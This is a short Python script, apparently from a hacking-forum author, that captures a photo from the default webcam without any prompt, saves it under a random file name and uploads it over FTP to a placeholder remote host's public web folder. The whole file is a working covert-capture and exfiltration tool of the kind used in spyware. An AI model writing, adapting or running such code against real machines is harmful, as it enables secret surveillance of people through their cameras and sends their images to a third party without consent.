'''
    Author: Kulverstukas
    Date: 2016-11-14
    Website: 9v.lt; evilzone.org
    Description:
        Grabs a photo through the default webcam and uploads it to the FTP.
        More info: 9v.lt
        Requires PIL to be installed.
'''

import string
import time
from VideoCapture import Device
from random import randint
from ftplib import FTP

#==============================================================
def generateRandomName():
    chars = list(string.ascii_lowercase)+list(string.digits)
    fileName = ""
    for i in range(15):
        fileName += chars[randint(0, len(chars)-1)]
    return fileName
#==============================================================

# save image with random name for a separate folder
fileName = generateRandomName()+".jpg"
fullPath = 'images/'+fileName
Device(devnum=0).getImage(timestamp=0).resize((800, 600)).save(fullPath)
# Device(devnum=0).saveSnapshot(fullPath)

# upload the image to the FTP
ftp = FTP("somehost.lt")
ftp.login("someuser", "")
ftp.cwd("/domains/somehost.lt/public_html/asdfg/")
ftp.storbinary('STOR '+fileName, open(fullPath, 'rb'))
ftp.quit()

